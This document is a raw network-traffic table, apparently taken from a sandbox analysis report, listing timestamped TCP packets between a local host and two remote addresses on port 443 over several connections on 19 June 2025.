Jun 19, 2025 12:58:56.111063004 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.114006042 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.114095926 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.114105940 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.114142895 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.114171982 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.116616964 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.116700888 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.116703033 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.116759062 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.119498014 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.119577885 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.119596004 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.119667053 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.122239113 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.122320890 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.123065948 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.123174906 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.125965118 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.126065969 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.126070976 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.126151085 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.128720999 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.128815889 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.128819942 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.128887892 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.130588055 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.131370068 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.131464958 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.131475925 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.131586075 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.133986950 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.134074926 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.134078026 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.134160042 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.137577057 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.137675047 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.137681961 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.137768984 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.138705969 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.138792992 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.138803959 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.138834000 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.138866901 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.141469002 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.141544104 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.141556025 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.141640902 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.143894911 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.143985987 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.144004107 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.144083977 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.146548033 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.146642923 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.146651983 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.146739960 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.149183989 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.149267912 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.149275064 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.149400949 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.149400949 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.151168108 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.151257992 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.151278019 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.151331902 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.153069019 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.153160095 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.153163910 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.153223991 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.155740023 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.155827045 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.155831099 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.155889988 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.157654047 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.157738924 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.157747030 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.157826900 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.160221100 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.160312891 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.160330057 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.160404921 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.162329912 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.162377119 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.162410975 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.162431002 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.162501097 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.164338112 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.164427042 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.164427042 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.164496899 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.168555975 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.168636084 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.168642044 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.168713093 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.170430899 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.170510054 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.170517921 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.170588970 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.171956062 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.172044992 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.172063112 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.172135115 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.174671888 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.174757004 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.174757957 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.174839973 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.176326036 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.176424980 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.176453114 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.176529884 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.178030014 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.178112984 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.178134918 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.178199053 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.180371046 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.180453062 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.180459976 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.180532932 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.182418108 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.182502031 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.182508945 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.182579041 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.184279919 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.184350014 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.184369087 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.184433937 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.186191082 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.186244011 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.186275959 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.186351061 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.187957048 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.188040018 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.188041925 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.188110113 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.189838886 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.189929962 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.189930916 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.189996958 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.191694975 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.191768885 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.191777945 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.191842079 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.193504095 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.193583965 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.193598032 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.193670034 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.195403099 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.195483923 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.195487976 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.195555925 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.196470976 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.196557045 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.196597099 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.196628094 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.198266029 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.198344946 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.198367119 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.198432922 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.200179100 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.200267076 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.200282097 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.200351000 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.202135086 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.202214956 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.202228069 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.202290058 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.203161001 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.203237057 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.203289986 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.203357935 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.204920053 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.204993010 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.205008030 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.205069065 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.209816933 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.209899902 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.209922075 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.209990025 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.210005999 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.210067987 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.210086107 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.210148096 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.211345911 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.211427927 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.211435080 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.211502075 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.212583065 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.212656021 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.212690115 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.212764978 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.213161945 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.213238001 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.213248968 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.213306904 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.215771914 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.215830088 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.215873957 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.215945005 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.216113091 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.216166973 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.259778023 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:58:56.305133104 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:58:56.339554071 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.339620113 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.339694023 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.340133905 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.340146065 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.534998894 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.535075903 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.536039114 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.536051035 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.536211014 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.536221027 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.536369085 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.536375046 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.536690950 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.537178040 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.537338018 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.537388086 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.537503004 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.580291033 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.627707005 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.654270887 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.654288054 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.654382944 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.654402971 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.654460907 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.720094919 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.720113039 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.720201969 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.750653028 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.750783920 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.776164055 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.776303053 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.800226927 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.800340891 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.818969011 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.819061041 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.840871096 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.840974092 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.841150045 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.841207027 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:56.844250917 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:56.886998892 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.319148064 CEST	49709	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.319194078 CEST	443	49709	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.319256067 CEST	49709	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.319603920 CEST	49709	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.319612026 CEST	443	49709	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.518328905 CEST	443	49709	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.518436909 CEST	49709	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.521018982 CEST	49709	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.521027088 CEST	443	49709	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.521219969 CEST	49709	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.521224022 CEST	443	49709	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.521523952 CEST	49709	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.521528959 CEST	443	49709	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.521651030 CEST	443	49709	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.522211075 CEST	443	49709	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.522496939 CEST	49709	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.522687912 CEST	49709	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.523225069 CEST	443	49709	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.569040060 CEST	49709	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.625781059 CEST	443	49709	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.626348019 CEST	443	49709	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.626393080 CEST	49709	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.627439976 CEST	443	49709	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.628941059 CEST	49710	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.628988981 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.629117966 CEST	49710	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.629762888 CEST	49710	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.629771948 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.679019928 CEST	49709	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.818413019 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.818499088 CEST	49710	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.855650902 CEST	49710	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.855685949 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.855873108 CEST	49710	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.855881929 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.856271982 CEST	49710	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.856276989 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.856297970 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.856323957 CEST	49710	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.856853008 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.857623100 CEST	49710	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.857952118 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.861155987 CEST	49710	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.908272028 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.963591099 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.963821888 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.963882923 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.964018106 CEST	49710	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:58:57.965142012 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:58:57.965284109 CEST	49710	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:59:11.415162086 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.415198088 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.415216923 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.415221930 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.416817904 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.460012913 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.505341053 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.505990028 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506004095 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506031036 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506046057 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506055117 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.506071091 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506079912 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506098032 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.506099939 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506112099 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506124973 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.506130934 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506139040 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506146908 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.506191015 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.506195068 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506205082 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506237984 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506248951 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.506287098 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506310940 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.506318092 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506392956 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.506392956 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.506853104 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506933928 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.506937027 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.507003069 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.507005930 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.507071972 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.507287025 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.507369995 CEST	49702	443	192.168.2.6	142.251.40.225
